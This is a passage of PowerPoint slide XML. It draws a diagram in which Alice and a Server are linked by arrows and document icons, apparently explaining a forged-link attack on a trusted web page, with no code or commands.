                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rged  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55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dirty="0" sz="1600" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>nk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-11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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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65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dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>logs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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3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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>page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286500" y="3272028"/>
            <a:ext cx="5744210" cy="4297045"/>
            <a:chOff x="6286500" y="3272028"/>
            <a:chExt cx="5744210" cy="4297045"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6909054" y="6340729"/>
              <a:ext cx="3583304" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3583304" h="142875">
                  <a:moveTo>
                    <a:pt x="3439922" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3439922" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554323" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454273" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454273" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554120" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3439922" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3583304" h="142875">
                  <a:moveTo>
                    <a:pt x="3439922" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3439922" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3439922" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3583304" h="142875">
                  <a:moveTo>
                    <a:pt x="3554120" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3454273" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454273" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554323" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3582797" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554120" y="5715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86500" y="3272028"/>
              <a:ext cx="859536" cy="85801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669913" y="4278756"/>
              <a:ext cx="142875" cy="3267710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="142875" h="3267709">
                  <a:moveTo>
                    <a:pt x="142875" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137274" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="139992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57251" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1604645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1662938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="3127489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="3196082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="3127489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="3145523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3196082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="3223907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="3246590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="3261868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="3267456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="3261868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="3246590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="3223907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="3196082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="3168256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="3145523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="3130207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="3127464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="3124581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1662938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1604645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="71501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32364" y="3294888"/>
              <a:ext cx="931164" cy="89916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0927969" y="4301616"/>
              <a:ext cx="142875" cy="3267710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="142875" h="3267709">
                  <a:moveTo>
                    <a:pt x="142875" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137274" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="139992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57251" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1604645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1662938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="3127489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="3196082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="3127489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="3145523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3196082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="3223907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="3246590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="3261868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="3267456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="3261868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="3246590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="3223907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="3196082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="3168256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="3145523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="3130207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="3127464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="3124581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1662938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1604645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="71501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0690097" y="4908042"/>
              <a:ext cx="585470" cy="771525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="585470" h="771525">
                  <a:moveTo>
                    <a:pt x="487679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="771144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585216" y="771144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585216" y="97536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4876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0690097" y="4908042"/>
              <a:ext cx="585470" cy="771525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="585470" h="771525">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585216" y="97536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585216" y="771144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77114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0784585" y="5314950"/>
              <a:ext cx="410845" cy="236220"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="410845" h="236220">
                  <a:moveTo>
                    <a:pt x="0" y="117348"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410845" y="117348"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="236220">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410845" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="236220">
                  <a:moveTo>
                    <a:pt x="0" y="236220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410845" y="236220"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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20984" y="5384292"/>
              <a:ext cx="416051" cy="416051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0690097" y="5933694"/>
              <a:ext cx="585470" cy="771525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="585470" h="771525">
                  <a:moveTo>
                    <a:pt x="487679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="771143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585216" y="771143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585216" y="97535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4876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0690097" y="5933694"/>
              <a:ext cx="585470" cy="771525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="585470" h="771525">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585216" y="97535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585216" y="771143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77114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0784585" y="6102858"/>
              <a:ext cx="410845" cy="472440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410845" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="118872"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410845" y="118872"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="355092"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410845" y="355092"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="236220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410845" y="236220"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="472440"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410845" y="472440"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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20984" y="6409944"/>
              <a:ext cx="416051" cy="414527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32364" y="6219444"/>
              <a:ext cx="300227" cy="301751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8779001" y="5933694"/>
              <a:ext cx="584200" cy="771525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="584200" h="771525">
                  <a:moveTo>
                    <a:pt x="486409" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="771143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583692" y="771143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583692" y="97281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4864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8779001" y="5933694"/>
              <a:ext cx="584200" cy="771525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="584200" h="771525">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="486409" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583692" y="97281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583692" y="771143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77114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8873489" y="6102858"/>
              <a:ext cx="410845" cy="472440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410844" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="118872"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410844" y="118872"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="355092"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410844" y="355092"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="236220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410844" y="236220"/>
                  </a:lnTo>
                </a:path>
                <a:path w="410845" h="472440">
                  <a:moveTo>
                    <a:pt x="0" y="472440"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410844" y="472440"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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09888" y="6409944"/>
              <a:ext cx="416051" cy="414527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21267" y="6219444"/>
              <a:ext cx="300227" cy="301751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1586971" y="3435096"/>
              <a:ext cx="443865" cy="464820"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="443865" h="464820">
                  <a:moveTo>
                    <a:pt x="369570" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73913" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45166" y="5816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21669" y="21669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5816" y="45166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="390905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5816" y="419653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21669" y="443150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45166" y="459003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73913" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369570" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398317" y="459003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421814" y="443150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437667" y="419653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443483" y="390905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443483" y="73913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437667" y="45166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421814" y="21669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398317" y="5816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369570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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484111" y="7700264"/>
            <a:ext cx="51435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404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ce</a:t>
            </a:r>
            <a:endParaRPr sz="16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488429" y="2925317"/>
            <a:ext cx="51435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404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ce</a:t>
            </a:r>
            <a:endParaRPr sz="16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0660506" y="7700264"/>
            <a:ext cx="67691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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Serve</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr sz="16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0660506" y="2935350"/>
            <a:ext cx="67691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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Serve</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr sz="16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2117069" y="3313938"/>
            <a:ext cx="2305050" cy="1000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635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-13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dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>he</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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6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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:r>
